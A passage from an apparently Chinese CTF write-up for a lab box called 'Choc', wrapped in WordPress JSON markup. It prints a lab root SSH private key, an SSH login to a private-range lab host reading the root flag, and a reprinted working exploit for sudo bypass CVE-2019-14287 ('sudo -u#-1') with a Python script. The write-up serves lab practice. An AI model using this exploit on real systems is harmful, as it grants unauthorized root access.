src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614214904922\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u4e0d\u884c\uff0c\u6211\u771f\u7684\u8981\u66b4\u8d70\u4e86\uff0c\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\u554a\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329108.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329108.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614224040949\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329109.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329109.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614224054119\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u7ba1\u4e86\uff0c\u964d\u7ef4\u6253\u51fb\uff0c\u4f7f\u7528\u5176\u4ed6\u6f0f\u6d1e\u8fdb\u884c\u653b\u51fb\uff0cfa\u53ef\uff01\uff01\uff01\uff01\uff01\u597d\u5427\u6ca1\u627e\u5230\u51e0\u4e2a\u80fd\u7528\u7684\u6f0f\u6d1e\u3002\u3002\u3002\u3002\u3002\u53cd\u6b63\u4e0a\u9762\u5c31\u662f\u51fa\u9898\u601d\u8def\u4e86\uff0c\u7ed3\u679c\u6211\u5c31\u5728\u5de8\u9b54\u5e08\u5085\u535a\u5ba2\u6284\u4e00\u4e0b\u4e86\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAuSMhRxXhWoexxyZWPK4pkjyVHhT1jAmUYdEhKEFBLZh9z93ZW25M\nlrj03xjFd4zP5AAHEG9p5h5SNi3ltHTtml7Nj59XlV6Heru\/cwX7Yykxu75tZRxzQR4EjV\nqUmxvqJgfql+XzKg3JgNwHRpG3tcW8Rdxbb3owVR97kjZP+3kA\/pQGrQKdFe893Q1u2oDa\n4R+v+jsYmzwjf\/1M8m\/S+J0hYzTOI+kQlBnZmMvpJYDidmyG1RO3dcLCpxCQpydH7GfO\/s\n6j0DdCvDr6+8C4eAzgDE5irjdMh2dKySNveNiMuhzsv1PS33ZWgx\/ITlxu9zwiuufQm6D5\nTcDYKMGCSQAAA8DHBCmTxwQpkwAAAAdzc2gtcnNhAAABAQC5IyFHFeFah7HHJlY8rimSPJ\nUeFPWMCZRh0SEoQUEtmH3P3dlbbkyWuPTfGMV3jM\/kAAcQb2nmHlI2LeW0dO2aXs2Pn1eV\nXod6u79zBftjKTG7vm1lHHNBHgSNWpSbG+omB+qX5fMqDcmA3AdGkbe1xbxF3FtvejBVH3\nuSNk\/7eQD+lAatAp0V7z3dDW7agNrhH6\/6OxibPCN\/\/Uzyb9L4nSFjNM4j6RCUGdmYy+kl\ngOJ2bIbVE7d1wsKnEJCnJ0fsZ87+zqPQN0K8Ovr7wLh4DOAMTmKuN0yHZ0rJI2942Iy6HO\ny\/U9LfdlaDH8hOXG73PCK659CboPlNwNgowYJJAAAAAwEAAQAAAQAQK31QlBymp4tjdXm6\nuwtudlQf2HzJylxnXriip3Bl5xe1\/A5r6epOj8Dza1pz4pyVsVrsmI6LRsKvcLrLVBscjI\nMvtB8WMLdshNFn3nHia0qoty0e06lNWq3TGsI3+ewtfiuDMNZYKfQbiRwpkbiV67tR7rkd\nt3JZPPKyBoRd1kGjnPzJc2DPyaAtJtS21w86ZxJZtaMWUL6SE1+80VWv0XXPtlmAipfdgF\n76A\/Z4izCNolx0s+Ptus8gqaxJDeGI4xX5aZZ33kc5cSvNjI2hH6kFX39sS7beVz\/zYDKA\nBkJ0fZpNQ+HZfqGvT93YHAFZVpdlv7ysn16oNkOwZuZxAAAAgQCs\/OtmKQ2SXR0ZrVryDk\n58HSK2xCRcMaOqNamWSm+JaKEusms25bCD3liQGbazJyy6eS7iR2DOQPYwdU94dak72X+W\nxwOexz8pwHGflvrA7SlKW4pXshuccpxgdC\/KkqZRQyQvy7NbDTyGM+3uTQSnABmZWl8mJa\nNtfY+fCEoKDgAAAIEA5urQzWNxzvBa4krknAuUMRD8TcsL4NjE6QCj9D1KJh2vGiBqNYjH\nf6hZ+4LPFlaWiusjxZAF6vIaZJU0UHRzdcITqm1L20CZQr2D3tgWS6+VAGQHb1me5uoC4J\n6Px6A7preSEjS2GtECqWxZevl8YqWEJtWaO1WDK61+Mr266UsAAACBAM0\/S7QUbRqSmNTq\nwd\/4y9U4JxtOfeV4O0I+JNlTPkA2vdUeHEwWkKRqk3re72JwYlUAsD4AhXO1oEdfpO32fx\nwavKtBNMpI64CiNVrPY8w9DPoWdCzxtFeRq1V50i9wdiVlHIdn0Ac+6T9Wv\/0v8J7GXIkH\ngskjOtELMuhigHo7AAAACXJvb3RAY2hvYwE=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>\u7136\u540e\u62ff\u5230flag\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Choc]\n\u2514\u2500$ chmod 600 root    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh root@192.168.10.103 -i root\n\n##############################\n#                            #\n#       Welcome to my SSH !  #\n#       Carl.                #\n#                            #\n##############################\n\nLinux choc 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Thu Apr 22 20:20:23 2021\nroot@choc:~# ls -la\ntotal 44\ndrwx------  5 root root 4096 Apr 20  2021 .\ndrwxr-xr-x 19 root root 4096 Apr 18  2021 ..\nlrwxrwxrwx  1 root root    9 Apr 20  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwx------  3 root root 4096 Apr 12  2021 .gnupg\ndrwxr-xr-x  3 root root 4096 Apr 12  2021 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-r--r--  1 root root   10 Apr 18  2021 r00t.txt\n-rw-r--r--  1 root root   66 Apr 19  2021 .selected_editor\ndrwx------  2 root root 4096 Apr 20  2021 .ssh\n-rw-r--r--  1 root root  202 Apr 18  2021 .wget-hsts\n-rw-------  1 root root   52 Apr 15  2021 .Xauthority\nroot@choc:~# cat r00t.txt \ninesbywal<\/code><\/pre>\n<h2>CVE-2019-14287<\/h2>\n<pre><code class=\"language-bash\"># Exploit Title : sudo 1.8.27 - Security Bypass\n# Date : 2019-10-15\n# Original Author: Joe Vennix\n# Exploit Author : Mohin Paramasivam (Shad0wQu35t)\n# Version : Sudo &lt;1.8.28\n# Tested on Linux\n# Credit : Joe Vennix from Apple Information Security found and analyzed the bug\n# Fix : The bug is fixed in sudo 1.8.28\n# CVE : 2019-14287\n\n&#039;&#039;&#039;Check for the user sudo permissions\n\nsudo -l \n\nUser hacker may run the following commands on kali:\n    (ALL, !root) \/bin\/bash\n\nSo user hacker can&#039;t run \/bin\/bash as root (!root)\n\nUser hacker sudo privilege in \/etc\/sudoers\n\n# User privilege specification\nroot    ALL=(ALL:ALL) ALL\n\nhacker ALL=(ALL,!root) \/bin\/bash\n\nWith ALL specified, user hacker can run the binary \/bin\/bash as any user\n\nEXPLOIT: \n\nsudo -u#-1 \/bin\/bash\n\nExample : \n\nhacker@kali:~$ sudo -u#-1 \/bin\/bash\nroot@kali:\/home\/hacker# id\nuid=0(root) gid=1000(hacker) groups=1000(hacker)\nroot@kali:\/home\/hacker#\n\nDescription :\nSudo doesn&#039;t check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv\n-u#-1 returns as 0 which is root&#039;s id\n\nand \/bin\/bash is executed with root permission\nProof of Concept Code :\n\nHow to use :\npython3 sudo_exploit.py\n\n&#039;&#039;&#039;\n\n#!\/usr\/bin\/python3\n\nimport os\n\n#Get current username\n\nusername = input(&quot;Enter current username :&quot;)\n\n#check which binary the user can run with sudo\n\nos.system(&quot;sudo -l &gt; priv&quot;)\n\nos.system(&quot;cat priv | grep &#039;ALL&#039; | cut -d &#039;)&#039; -f 2 &gt; binary&quot;)\n\nbinary_file = open(&quot;binary&quot;)\n\nbinary= binary_file.read()\n\n#execute sudo exploit\n\nprint(&quot;Lets hope it works&quot;)\n\nos.system(&quot;sudo -u#-1 &quot;+ binary)\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Choc \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc] \u2514\u2500$ sudo nm [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-876","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/876","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=876"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/876\/revisions"}],"predecessor-version":[{"id":877,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/876\/revisions\/877"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=876"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=876"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=876"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}